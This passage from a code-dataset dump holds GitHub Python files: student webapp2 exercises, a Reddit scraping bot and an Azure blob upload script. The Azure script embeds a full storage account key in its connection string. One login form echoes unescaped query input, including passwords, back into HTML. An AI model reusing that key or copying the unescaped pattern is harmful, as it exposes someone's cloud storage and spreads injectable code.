__name__ == \"__main__\":\n main()\n"
}
] | 2 |
ednalda/Design-Patterns-for-Web-Programming
|
https://github.com/ednalda/Design-Patterns-for-Web-Programming
|
1a0e69375f874f3567480f6b5a8e6d0efa14feaf
|
de997d4f3d55f1cc345240ea927ea72584cef0c7
|
f84380836f847b1d1cd02a4db6a412db96ade3bd
|
refs/heads/master
| 2021-01-18T11:33:09.213017 | 2014-10-06T17:36:27 | 2014-10-06T17:36:27 | null | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.4618671238422394,
"alphanum_fraction": 0.4695577919483185,
"avg_line_length": 45.3564338684082,
"blob_id": "c130a883f3c78f61b98af8977e4ea7be7d291f5c",
"content_id": "1f1b239b5f56ab9420f0b4b7f7f21d8f7b97d3db",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 4681,
"license_type": "no_license",
"max_line_length": 211,
"num_lines": 101,
"path": "/simple-login/main.py",
"repo_name": "ednalda/Design-Patterns-for-Web-Programming",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python\n#\n# Copyright 2007 Google Inc.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n#\n'''\nname:Ednalda Fakira\ndate:09/11/14\nclass:Design Patterns for Web Programming - Online\nassignment: Simple Form\n'''\nimport webapp2 # use the webapp2 library\n\nclass MainHandler(webapp2.RequestHandler): #declaring a class\n def get(self): #function that starts everything. Catalyst\n\n page_head = ''' <!DOCTYPE HTML>\n<html>\n <head>\n <title>\"BoatHouse\"</title>\n <link href=\"css/style.css\" rel=\"stylesheet\" type=\"text/css\" />\n </head>\n <body> '''\n page_body = ''' <div id=\"content\">\n <div id=\"header\">\n <h1> The BoatHouse</h1>\n <ul>\n <li><a href=\"#\" class=\"link\">Home</a></li>\n <li><a href=\"#\" class=\"link\">News</a></li>\n <li><a href=\"#\" class=\"link\">Favorite</a></li>\n <li><a href=\"#\" class=\"link\">About</a></li>\n <li><a href=\"#\" class=\"link\">Log On</a></li>\n </ul>\n </div>\n <form method=\"GET\" action=\"\">\n <h2>Register to post your Add</h2>\n <label>Name: </label><br/><input type=\"text\" name=\"user\" class=\"input\" /><br />\n <label>Address: </label><br/><input type=\"text\" name=\"address\" class=\"input\" /><br />\n <label>Phone: </label><br/><input type=\"text\" name=\"phone\" class=\"input\"/><br /><br /><br />\n <label>Ad</label><br/><input type=\"text\" name=\"ad\" class=\"input\"/><br /><br /><br />\n <label>Email: </label><br/><input type=\"text\" name=\"email\" class=\"input\"/><br />\n <label>Password: </label><br/><input type=\"text\" name=\"password\" class=\"input\" /><br /><br /><br />\n <input type=\"checkbox\" name=\"policy\" value =\"policy\"><a href=\"#\" class=\"link\">Agree with Policy</a><br /><br />\n <input type=\"submit\" value=\"Submit\" class=\"submit\" /> </form>'''\n page_answer = '''\n <div id=\"page\">\n <div id=\"header\">\n <h1> The BoatHouse</h1>\n <ul>\n <li><a href=\"#\" class=\"link\">Home</a></li>\n <li><a href=\"#\" class=\"link\">News</a></li>\n <li><a href=\"#\" class=\"link\">Favorite</a></li>\n <li><a href=\"#\" class=\"link\">About</a></li>\n <li><a href=\"#\" class=\"link\">Log On</a></li>\n </ul>\n </div>\n <div id=\"page_content\">\n <h3>Name:</h3> <h3>Address:</h3> <h3>Phone:</h3> <h3>Email:</h3> <h3>Password:</h3> <h3>Ad:</h3>\n </div>\n </div>\n '''\n page_close = '''\n </div>\n </body>\n</html> '''\n\n\n\n if self.request.GET: #stablish condition\n user = self.request.GET['user']#condition true\n address = self.request.GET['address']#condition true\n phone = self.request.GET['phone']#condition true\n ad = self.request.GET['ad']\n email = self.request.GET['email']#condition true\n password = self.request.GET['password']#condition true\n policy = self.request.GET ['policy']\n self.response.write(page_head + page_answer + ' ' + user + ' ' + address + ' ' + phone + ' ' + email + ' ' + password + ' ' + ad + ' ' + policy + ' ' + page_close)#all condition are true\n\n\n else: #if condition above not satisfied, print next line\n self.response.write(page_head + page_body + page_close)#print out page\n\n\n\n\n\n\napp = webapp2.WSGIApplication([\n ('/', MainHandler)\n], debug=True)"
},
{
"alpha_fraction": 0.6022624373435974,
"alphanum_fraction": 0.6230769157409668,
"avg_line_length": 35.528926849365234,
"blob_id": "42f4217f357397aa31c2efefd4c01a04ac109261",
"content_id": "419b9342de33fc2468c251150937907a68582eee",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 4420,
"license_type": "no_license",
"max_line_length": 133,
"num_lines": 121,
"path": "/encapsulation/main.py",
"repo_name": "ednalda/Design-Patterns-for-Web-Programming",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python\n#\n# Copyright 2007 Google Inc.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n#\n'''\nname:Ednalda Fakira\ndate:18/11/14\nclass:Design Patterns for Web Programming - Online\nassignment: Encapsulating\n'''\nimport webapp2\n#it connects to class Page in a separate file.\nfrom pages import Page\n#it connects to class Delivered from deliveres file.\nfrom deliveres import Delivered\nclass MainHandler(webapp2.RequestHandler):\n def get(self):\n #function defines attributes of five objects: s, n, f, j, m\n #get function print_out to print html\n #get function if statement that defines condition for printing class Delivered attributes\n\n s = Delivered()#defines class delivered attributes for September\n s.sale1 = 40#how much it cost each sales\n s.sale2 = 69\n s.sale3 = 36\n s.sale4 = 89\n s.sale5 = 24\n s.calc_total()#function to calculate the total of September sales.\n\n\n #\"November\" class delivered variables\n n = Delivered()#defines class delivered attributes for November\n n.sale1 = 50#how much it cost each sales\n n.sale2 = 55\n n.sale3 = 68\n n.sale4 = 93\n n.sale5 = 32\n n.calc_total()#function to calculate the total of November sales.\n\n\n #February delivered\n f = Delivered()#defines class delivered attributes for February\n f.sale1 = 24#how much it cost each sales\n f.sale2 = 12\n f.sale3 = 18\n f.sale4 = 84\n f.sale5 = 34\n f.calc_total()#function to calculate the total of February sales.\n\n\n\n j = Delivered()#defines class delivered attributes for June\n j.sale1 = 50#how much it cost each sales\n j.sale2 = 50\n j.sale3 = 50\n j.sale4 = 50\n j.sale5 = 50\n j.calc_total()#function to calculate the total of June sales.\n\n\n #May delivered\n m = Delivered()#defines class delivered attributes for May\n m.sale1 = 50#how much it cost each sales\n m.sale2 = 50\n m.sale3 = 50\n m.sale4 = 50\n m.sale5 = 50\n m.calc_total()#function to calculate the total of May sales.\n\n\n\n #call class Page to print in this page\n p = Page()\n self.response.write(p.print_out())\n\n #if the links are requested, it's print_out_data function called to print the data from the self.month\n if self.request.GET:\n #if we have September after name in url\n if self.request.GET['name'] == 'september':\n p.month_data = s #part of the html from class Page that holds the class Delivered attributes for each month\n title ='s.title'\n self.response.write(p.print_out_data())# call function print_out_data from class Page to print Delivered attributes.\n #if we have November after name in url\n elif self.request.GET ['name'] == 'november':\n p.month_data = n\n self.response.write('November' + p.print_out_data())\n #if we have February after name in url\n elif self.request.GET ['name'] == 'february':\n p.month_data = f\n self.response.write(p.print_out_data())\n #if we have June after name in url\n elif self.request.GET ['name'] == 'june':\n p.month_data = j\n self.response.write(p.print_out_data())\n #if we have May after name in url\n elif self.request.GET ['name'] == 'may':\n p.month_data = m\n self.response.write(p.print_out_data())\n #if we don't find any of the names above after name in url, just print same page\n else:\n self.response.write(p.head + p.body + p.close)\n #the print is empty to avoid the same page print twice.\n else:\n self.response.write('')\n\n\napp = webapp2.WSGIApplication([\n ('/', MainHandler)\n], debug=True)\n"
},
{
"alpha_fraction": 0.42394503951072693,
"alphanum_fraction": 0.4278704524040222,
"avg_line_length": 21.622222900390625,
"blob_id": "0e63718fd633b86f24e9188e917e76b6e7bdb43b",
"content_id": "4ae81fb87c5954d58ca606cbcb6c9b945e7b58bd",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1019,
"license_type": "no_license",
"max_line_length": 67,
"num_lines": 45,
"path": "/proof/view.py",
"repo_name": "ednalda/Design-Patterns-for-Web-Programming",
"src_encoding": "UTF-8",
"text": "#Ednalda Fakira\n#Assigment: Proof of Concept\n#Course:Design Patterns for Web Programming\n#Instructor: Rebecca Carroll\n\n\n#MVC = v(view)\nclass AppView(object):#superclass\n def __init__(self):\n self.title = \"MovieNight!\"\n self.css = \"css/style.css\"\n self.head = \"\"\"\n<!DOCTYPE HTML>\n <html>\n <head>\n <title>{self.title}</title>\n <link href=\"{self.css}\" rel=\"stylesheet\" type=\"text/css\" />\n </head>\n <body>\n \"\"\"\n\n self.body = ''' <div id =\"page\">\n <header>\n <nav><h1>MovieNight</h1></nav>\n <h2>Search movies by Actor</h2>\n </header>\n <div id=\"content\">\n\n </div>\n </div>\n\n '''\n\n self.close = \"\"\"\n\n\n </body>\n </html>\n \"\"\"\n\n\n def print_out_view(self):\n all = self.head + self.body + self.close\n all = all.format(**locals())\n return all\n\n"
},
{
"alpha_fraction": 0.6966156363487244,
"alphanum_fraction": 0.7179693579673767,
"avg_line_length": 30.012500762939453,
"blob_id": "0176f65e677a67d52780e851a35ee6746ed54761",
"content_id": "dc60302441de568009e22c7ed2553854d955f764",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2482,
"license_type": "no_license",
"max_line_length": 139,
"num_lines": 80,
"path": "/fakira_ednalda_Madlib/main.py",
"repo_name": "ednalda/Design-Patterns-for-Web-Programming",
"src_encoding": "UTF-8",
"text": "#3 capturing Strings\nfirst_name = \"Ednalda\"\nlast_name = \"Fakira\"\nprint first_name + last_name #print variables to show complete name\n\n\nname = raw_input(\"Enter your last name\")\nprint name\nprint \"Hello \", name #print message + variable that holds name\n\ncity = 'orlando'\nstate = 'Florida'\nmessage = your city is {city} and your state is {state} #passing values city and state to variable message \nmessage = message.format (**locals()) #to accept all locall format \nprint message #print variable message\n\n\n#array\nbooks = [\"The Giver\", \"Violet are Blue\"]\nbooks.append(\"Picking Cotton\") #insert a new book to the end of the array\nprint books [0]#choose which book to print by the position on the array\n\n\n# creatin a dictionary object for types of food\nfood = dict() \nfood = {\"fruit\":\"orange\", \"vegetable\" : \"spinach\"}\nprint food[\"vegetable\"]\n\n#2 operation\n#calculating how long to finish school\nschool_start = 2000 #variable that holds the start school year\ncurrent_year = 2014 #variable that holds the end school year\nhowLong = school_start - current_year #variable that holds the operation to calculate how long to finish school\nprint \"How long to graduate \" + str(howLong) + \"years\" \n\n#calculating iventory\nchair = 20\ntable = 5\ndiningTable = chair * table #variable that calculates how many dining room sets\nprint \"Inventory result is \" + str(diningTable) #to print message + variable diningTable, strings \"chair\" and \"table\" need to be specified\n\n\n\n#2 conditional\n#checking how life is good!\ngrade = 100 #top grade in class\nif grade > 90: #if grade is more than 90, print variable college\n college = \"nice\"\n print \"This\" + college + \"is coll!\"\nelse: #if not the condition above, print \"No cool.\"\n\tprint \"No cool.\"\n\nor\n\nsalary = 250 #top salary\nif salary > 200: #if salary is more than $200,000 print variable life\n\tlife = \"good\"\n\tprint \"My life is\" + life \n\nelif salary > 80 #if salary is more than $80,000 print \"My lif is ok\"\n\tprint \"My life is ok\"\nelse: #if none the conditions above print \"I need to go back to school.\"\n\tprint \"I need to go back to school.\"\n\n\n\n#FUNCTION\nx=4 # empty land\ndef calcArea(h,w):#function t calculate the area of a house\n\tarea = h * w #hight * width\n\treturn area + x #return total house area occupied \n\ta = calcArea(50,40);#values of h and w\n\tprint \"My house is \" + str(a) + \"sqft\"\n\n\n#WHILE LOOP\na = 0 #Start variable a=0\nwhile a<20: #count how many pages a user reads untill reach 19 pages. \nprint \"The count is\", a\na = a+1 #add next page \n"
},
{
"alpha_fraction": 0.6441605687141418,
"alphanum_fraction": 0.6496350169181824,
"avg_line_length": 39.29411697387695,
"blob_id": "1e4032403e258a4e8b89b777e5b7e623bdb87a59",
"content_id": "8ef372775f2313cc42c3a432620f8b50b85037d0",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2740,
"license_type": "no_license",
"max_line_length": 261,
"num_lines": 68,
"path": "/proof/main.py",
"repo_name": "ednalda/Design-Patterns-for-Web-Programming",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python\n#\n# Copyright 2007 Google Inc.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n#\n\n#MVC = c(controller)\nimport webapp2\nimport urllib2#python class to request, receive, and open\nimport json\n\n\nfrom collect import AppForm\n\nclass MainHandler(webapp2.RequestHandler):\n def get(self):#request data to return on html\n view = AppForm() #AppForm subclass inherits everything (method, variable) from the superclass View\n view.inputs = [['title', 'text', 'movie'],['submit','Submit']] #user input movie title\n self.response.write(view.print_out_form())#respond user request\n #get information from urllib2 library to request the url\n\n if self.request.GET:\n if self.request.GET: #if is a request look for key=title return show_title, movie_cast, movie_director, and release year of the movie requested.\n title = self.request.GET['title']#if the user request a movie title that is found, the result will be open.\n url = \"http://netflixroulette.net/api/api.php?title=\" + title#api address requested\n request = urllib2.Request(url) #variable request value: python class library request url \"http://netflixroulette.net/api/api.php?title=\"\n opener = urllib2.build_opener()\n result = opener.open(request)\n\n #parse json\n jsondoc = json.load(result)#the json code will be showed through the variables\n movie = jsondoc['show_title']\n movie_cast = jsondoc['show_cast']\n movie_director = jsondoc['director']\n movie_category = jsondoc ['category']\n movie_summary = jsondoc ['summary']\n movie_year = jsondoc['release_year']\n self.response.write(\"Movie: \" + movie + \"<br/>\" + \"Cast: \" + movie_cast + \"<br/>\" + \"Director: \" + movie_director + \"<br/>\" + \"Category: \" + movie_category + \"<br/>\" + \"Summary: \" + movie_summary + \"<br/>\" \"Year \" + movie_year)\n\n else:#if user do not enter right movie title, message will return\n self.response.write('Please, enter another movie')\n\n\n\n\n\n\n\n\n\n\n\n\n\napp = webapp2.WSGIApplication([\n ('/', MainHandler)\n], debug=True)\n"
},
{
"alpha_fraction": 0.6214689016342163,
"alphanum_fraction": 0.6257061958312988,
"avg_line_length": 39.485713958740234,
"blob_id": "0330bd3a39f0464aab7b2437f35497af739e39a3",
"content_id": "e0fe1b55ae981d318bf15d9e48af8dcb6342e997",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1416,
"license_type": "no_license",
"max_line_length": 111,
"num_lines": 35,
"path": "/proof/collect.py",
"repo_name": "ednalda/Design-Patterns-for-Web-Programming",
"src_encoding": "UTF-8",
"text": "__author__ = 'ednaldafakira'\n#MVC = m(model)\nfrom view import AppView\nclass AppForm(AppView):#inheriting from Class AppView\n def __init__(self):#construction function for class appView\n super(AppForm, self).__init__()#AppForm inherit object from AppView\n self.form_open = '<form method=\"GET\">'# form attributes.\n self.form_close = '</form>'\n self.__inputs = []#private attribute protect information collected by user through input(movie name)\n self.form_inputs = ''\n\n @property#to be able access the inputs attributes and overrides, the decorator: property is here and empty.\n def inputs(self):\n pass\n\n @inputs.setter#to access and overrides inputs\n def inputs(self, arr):\n self.__inputs = arr\n for item in arr:#sending data \"from\" the attribute inputs to the array: view.inputs as requested\n self.form_inputs += '<input type=\"' + item[1] + '\" name=\"' + item[0]\n if len(item) > 2:#if in the array has 3 items add placeholder\n self.form_inputs += '\" placeholder=\"' +item[2]+'\" />'\n else:#if the array doesn't have 3 items, just add input and name values.\n self.form_inputs += '\" />'\n\n\n\n\n\n\n\n def print_out_form(self):\n data = self.head + self.body + self.form_open + self.form_inputs + self.form_close + self.close\n data = data.format(**locals())\n return data"
},
{
"alpha_fraction": 0.677450954914093,
"alphanum_fraction": 0.6931372284889221,
"avg_line_length": 41.5,
"blob_id": "69aee87e3907aa65dd97c4ebeb4622262b77d4a4",
"content_id": "e0adca01b91cdd68f71869dcb555fe7f7c8f15f4",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1020,
"license_type": "no_license",
"max_line_length": 156,
"num_lines": 24,
"path": "/encapsulation/deliveres.py",
"repo_name": "ednalda/Design-Patterns-for-Web-Programming",
"src_encoding": "UTF-8",
"text": "__author__ = 'ednaldafakira'\n\nclass Delivered(object):#class to call the attributes of objects.\n def __init__(self): #Construction method to design the object (Delivered)\n\n self.sale1= 0\n self.sale2= 0\n self.sale3= 0\n self.sale4= 0\n self.sale5= 0\n self.__total= 0 #private attribute only access inside this class\n\n\n #decorators treating properties as variables\n @property #getter: to return the total sales. It's accessing the total monthly sales attribute that is private only accessed inside the class Delivered.\n def total(self):#function\n return self.__total # return the total monthly sales attribute\n\n @total.setter #setter: It gives the ability to update the total monthly sales result as it need.\n def total(self, new_total):\n self.__total = new_total\n\n def calc_total(self):#function to calculate the total monthly sales by adding the sales together.\n self.__total = self.sale1 + self.sale2 + self.sale3 + self.sale4 + self.sale5\n"
},
{
"alpha_fraction": 0.30246153473854065,
"alphanum_fraction": 0.3113846182823181,
"avg_line_length": 38.524391174316406,
"blob_id": "4b90c80bb0d2c7b1c549fd491c2b1f8385ea7b31",
"content_id": "b94083ec90a5e40fbc211587ad2c1675d5d702c7",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3250,
"license_type": "no_license",
"max_line_length": 118,
"num_lines": 82,
"path": "/encapsulation/pages.py",
"repo_name": "ednalda/Design-Patterns-for-Web-Programming",
"src_encoding": "UTF-8",
"text": "__author__ = 'ednaldafakira'\n\nfrom deliveres import Delivered\nclass Page(object):\n def __init__(self):\n self.title = \"Welcome!\"\n self.css = \"css/style.css\"\n self.head = \"\"\"\n<!DOCTYPE HTML>\n <html>\n <head>\n <title>{self.title}</title>\n <link href=\"{self.css}\" rel=\"stylesheet\" type=\"text/css\" />\n </head>\n <body>\n \"\"\"\n\n self.body = '''<div id = \"page\">\n <header>\n <nav>\n <ul>\n <li><h1><img src=\"images/logo.jpg\" class=\"logo\" />Sweet Flower Shop </h1></li>\n <ul class=\"sub_nav\">\n <li><a href=\"#\">Home</a></li>\n <li><a href=\"#\">Orders</a></li>\n <li><a href=\"#\" class=\"active\">Delivered</a></li>\n <li><a href=\"#\">Hot Deals</a></li>\n <li><a href=\"#\">Sign Out </a></li>\n </ul>\n </ul>\n </nav>\n </header>\n <div id = \"content\">\n <article>\n <ul class=\"links\">\n <li><h2><a href=\"?name=september\">September</a></h2></li>\n <li><h2><a href=\"?name=november\">November</a></h2></li>\n <li><h2><a href=\"?name=february\">February</a></h2></li>\n <li><h2><a href=\"?name=june\">June</a></h2></li>\n <li><h2><a href=\"?name=may\">May</a></h2></li>\n </ul>\n </article>\n '''\n\n\n self.month_data = Delivered()\n\n\n self.month = '''\n <aside>\n\n <ul class=\"links\">\n <li>\n <h3>Basket of Joy: {self.month_data.sale1}</h3>\n <h3>Country Basket Blooms: {self.month_data.sale2} </h3>\n <h3>Summer Brights: {self.month_data.sale3} </h3>\n <h3>Blooms: {self.month_data.sale4} </h3>\n <h3>Garden Romance: {self.month_data.sale5} </h3>\n <h3>Total: {self.month_data.total}</h3>\n </li>\n </ul>\n </aside>\n </div>\n '''\n\n self.close = \"\"\"\n\n </div>\n\n </body>\n </html>\n \"\"\"\n\n def print_out(self):\n all = self.head + self.body + self.close\n all = all.format(**locals())\n return all\n\n def print_out_data(self):\n a = self.head + self.month + self.close\n a = a.format(**locals())\n return a\n\n\n\n\n\n\n\n\n\n"
}
] | 8 |
vilktor370/Reddit-Bot
|
https://github.com/vilktor370/Reddit-Bot
|
c9e68ac420786c25aada6fb3cd6f5f2dcd6e283a
|
1cc0dddbc226585a3093ff307a3243d5ec004b78
|
04957152c9c49d17b70df825939d0648ce7f8f89
|
refs/heads/master
| 2023-02-16T18:41:22.745389 | 2021-01-19T06:39:06 | 2021-01-19T06:39:06 | 330,277,050 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.5681445002555847,
"alphanum_fraction": 0.5738916397094727,
"avg_line_length": 28.707317352294922,
"blob_id": "fe0186cbc2708ae091ffb13d8d870bc1899fa54c",
"content_id": "8f0dc2c20453561e4ace12aee360bb754ad797b7",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1218,
"license_type": "no_license",
"max_line_length": 108,
"num_lines": 41,
"path": "/pic.py",
"repo_name": "vilktor370/Reddit-Bot",
"src_encoding": "UTF-8",
"text": "import praw, requests, os,sys\nimport config\nimport datetime\ndef log_in():\n reddit= praw.Reddit(\n client_id=config.client_id,\n client_secret=config.client_sec,\n user_agent=\"Tony's bot\",\n username=config.username,\n password=config.password,\n )\n reddit.read_only = True\n return reddit\ndef get_post(reddit,name,count): \n '''\n Alternative method\n url = \"https://www.reddit.com/r/uofm/comments/je44pg/course_selection_and_scheduling_megathread_winter/\"\n submission=reddit.submission(url=url)\n for i in submission.comments:\n print(i)\n '''\n url_lst=[]\n subreddit=reddit.subreddit(name)\n page=subreddit.hot(limit=count)\n \n for i in page:\n print(str(i.url))\n url=str(i.url)\n if 'png' in url or 'jpeg' in url or 'jpg' in url:\n url_lst.append(url)\n for c,i in enumerate(url_lst):\n response = requests.get(i)\n with open('img'+str(c)+'.png', 'wb') as f:\n f.write(response.content)\ndef main(argv):\n r= log_in()\n get_post(r,argv[0],int(argv[1]))\n #print(argv[0],argv[1])\n\nif __name__ == \"__main__\":\n main(sys.argv[1:])\n"
},
{
"alpha_fraction": 0.573913037776947,
"alphanum_fraction": 0.5819875597953796,
"avg_line_length": 29.37735939025879,
"blob_id": "89df97b44482a9b1d44827090c3cffd73db934d0",
"content_id": "204a6804b170afc2c797d666d3b198772f4aea7a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1610,
"license_type": "no_license",
"max_line_length": 108,
"num_lines": 53,
"path": "/main.py",
"repo_name": "vilktor370/Reddit-Bot",
"src_encoding": "UTF-8",
"text": "import praw\nimport config\nimport datetime\ndef log_in():\n reddit= praw.Reddit(\n client_id=config.client_id,\n client_secret=config.client_sec,\n user_agent=\"Tony's bot\",\n username=config.username,\n password=config.password,\n )\n reddit.read_only = True\n return reddit\ndef get_post(reddit): \n '''\n Alternative method\n url = \"https://www.reddit.com/r/uofm/comments/je44pg/course_selection_and_scheduling_megathread_winter/\"\n submission=reddit.submission(url=url)\n for i in submission.comments:\n print(i)\n '''\n url=''\n subreddit=reddit.subreddit('uofm')\n for i in subreddit.hot(limit=10):\n if 'Winter 2021' in i.title:\n url=i.url\n return url\ndef get_each_comment(url,reddit,course_name):\n submission=reddit.submission(url=url)\n \n submission.comments.replace_more(limit=None)\n sub_list=submission.comments.list()[:]\n count=1\n for comment in sub_list:\n if course_name in comment.body:\n c_time=datetime.datetime.utcfromtimestamp(comment.created_utc)\n print('*Post*',count,comment.author,c_time)\n print('#',comment.body)\n count+=1\n for i in comment.replies:\n r_time=datetime.datetime.utcfromtimestamp(i.created_utc)\n print(i.author,r_time,i.score,'votes')\n print('#','---',i.body)\n print('\\n\\n')\n \n \ndef main():\n r= log_in()\n url=get_post(r)\n get_each_comment(url,r,'SI 206')\n\nif __name__ == \"__main__\":\n main()\n"
},
{
"alpha_fraction": 0.7272727489471436,
"alphanum_fraction": 0.7272727489471436,
"avg_line_length": 52.16666793823242,
"blob_id": "73ab7f777c449032c73a64d05528feeda7653514",
"content_id": "6918a12eb8e25aed58d538db6805ef7b064e3f29",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 319,
"license_type": "no_license",
"max_line_length": 95,
"num_lines": 6,
"path": "/readme.md",
"repo_name": "vilktor370/Reddit-Bot",
"src_encoding": "UTF-8",
"text": "# Reddit rebot\n\n## config.py configurations such as password,username etc <br />\n## main.py read all the data from one subreddit and find useful comments and replies<br />\n## pic.py search number of posts in a subreddit and download all the picture into image<br />\n## resize.py resize, add style to a picture\n"
},
{
"alpha_fraction": 0.6931818127632141,
"alphanum_fraction": 0.7159090638160706,
"avg_line_length": 23.44444465637207,
"blob_id": "da0ffca3151688fc72ed9496808a29055b6e0de7",
"content_id": "0050b1a090dfab7a7bc1012d73ab323536e25f4a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 440,
"license_type": "no_license",
"max_line_length": 55,
"num_lines": 18,
"path": "/resize.py",
"repo_name": "vilktor370/Reddit-Bot",
"src_encoding": "UTF-8",
"text": "from PIL import Image\nimport glob\nimport numpy as np\nimport matplotlib.pyplot as plt\nimage_list = []\nfor filename in glob.glob('image/*.png'): #assuming gif\n im=Image.open(filename)\n image_list.append(im)\n#print(len(image_list))\nimg_data=np.array(image_list[0])\n#print(ary)\n#print('\\n\\n\\n\\n')\nimg_data=img_data\n#print(ary)\nimg_data[:1920,:1080,:]\nimg_data=np.flip(img_data,axis=1)\ntest=Image.fromarray(img_data)\ntest.save(\"test.png\")\n"
},
{
"alpha_fraction": 0.6600000262260437,
"alphanum_fraction": 0.6600000262260437,
"avg_line_length": 11.75,
"blob_id": "f2a2dd39456f83a673c9c9bc195b9a0554c87361",
"content_id": "b5268f20456ef3f6c9fb9eaf16513181d6454e56",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 50,
"license_type": "no_license",
"max_line_length": 13,
"num_lines": 4,
"path": "/config.py",
"repo_name": "vilktor370/Reddit-Bot",
"src_encoding": "UTF-8",
"text": "username=\"\"\npassword=\"\"\nclient_id=\"\"\nclient_sec=\"\""
},
{
"alpha_fraction": 0.6631578803062439,
"alphanum_fraction": 0.6947368383407593,
"avg_line_length": 12.714285850524902,
"blob_id": "8005bfce5d719cb689a05138e67835647ccf80ee",
"content_id": "c991f8e1454a5df7ed2cbe891f4b41bf11e302cf",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Makefile",
"length_bytes": 95,
"license_type": "no_license",
"max_line_length": 30,
"num_lines": 7,
"path": "/Makefile",
"repo_name": "vilktor370/Reddit-Bot",
"src_encoding": "UTF-8",
"text": "enjoy: try.py\n\tpython3 try.py 'EarthPorn' 10\n\tmkdir image\n\tmv *.png image\n\nclean: \n\trm -r image"
}
] | 6 |
Jackjaps/JacobsRepo
|
https://github.com/Jackjaps/JacobsRepo
|
ae54c9d4ad50920620a9077e355629fbb7a05f3f
|
8113b598e641332ae35db7026a4f4e13f072cdfb
|
84968047ba9faf7c3fe3564608753811ec1bb48d
|
refs/heads/master
| 2021-08-10T22:18:01.951911 | 2021-01-11T18:13:22 | 2021-01-11T18:13:22 | 99,493,572 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.7472984194755554,
"alphanum_fraction": 0.7531172037124634,
"avg_line_length": 35.45454406738281,
"blob_id": "10cad1385c42d56095f184bb2851e0d183c68db6",
"content_id": "d3edeac68283aa0624727068d1c9e3096641b676",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1203,
"license_type": "no_license",
"max_line_length": 121,
"num_lines": 33,
"path": "/loadAzure.py",
"repo_name": "Jackjaps/JacobsRepo",
"src_encoding": "UTF-8",
"text": "#python3 \n#pip install azureidentity\n#pip install azure \n\nfrom azure.storage.blob import BlobServiceClient\nfrom azure.storage.blob import ContainerClient\nfrom azure.storage.blob import BlobClient\nconnection_string = \"DefaultEndpointsProtocol=https;AccountName=pent001;AccountKey=TKjgBOqvXI79F3lCbD8C0w7DKkHYEtIKSBnqkAr4PGgqEclRwP+w8yBpBWDMCiOXOCtNdp7Pv7fdsKBQv+balQ==;EndpointSuffix=core.windows.net\"\n\ndef listBlobs (connection,containerName):\n service = BlobServiceClient.from_connection_string(conn_str=connection)\n container = ContainerClient.from_connection_string(conn_str=connection, container_name=containerName)\n blob_list = container.list_blobs()\n for blob in blob_list:\n print(blob.name + '\\n')\n\ndef uploadBlob(filenamepath,fileName,connection,containerName):\n blob = BlobClient.from_connection_string(conn_str=connection, container_name=containerName, blob_name=fileName)\n with open(filenamepath+fileName, \"rb\") as data:\n blob.upload_blob(data)\n print(\"File loaded\")\n\n#Storage Account: pent001\n#Container: prueba\n#Keyaccess: TKjgBOqvXI79F3lCbD8C0w7DKkHYEtIKSBnqkAr4PGgqEclRwP+w8yBpBWDMCiOXOCtNdp7Pv7fdsKBQv+balQ==\n\ndef main():\n print(\"List of blobs on the azure account\")\n listBlobs(connection_string,\"prueba\")\n #uploadBlob(\"./\",\"exampleFile.txt\",connection_string,\"prueba\")\n\nif __name__ == \"__main__\":\n main()\n"
},
{
"alpha_fraction": 0.6600790619850159,
"alphanum_fraction": 0.6719367504119873,
"avg_line_length": 18.461538314819336,
"blob_id": "bff6611b30a6d0cc5341ea1cac341a25ce1fdad9",
"content_id": "50b1e8a4c25413e996edf6761b5f399284567b69",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 759,
"license_type": "no_license",
"max_line_length": 58,
